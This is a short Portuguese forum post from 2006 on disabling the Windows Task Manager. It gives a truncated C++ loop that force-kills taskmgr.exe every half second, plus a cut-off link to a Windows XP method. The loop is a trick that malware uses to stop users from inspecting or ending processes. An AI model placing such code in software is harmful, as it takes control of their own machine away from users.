Ativando e desativando o Gestor de Tarefas do windows

Started by Anonymous, 05 de April , 2006, 07:40:06 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Em C++:

Quote#include
#include
void main(void){
while(1){
Sleep(500);
system("taskkill -f -im taskmgr.exe");
 }
}

Através do próprio WinXP:

http://www.windowsnetworking.com/kbase/ ... mePro.html

Fonte: TheG0st

 8)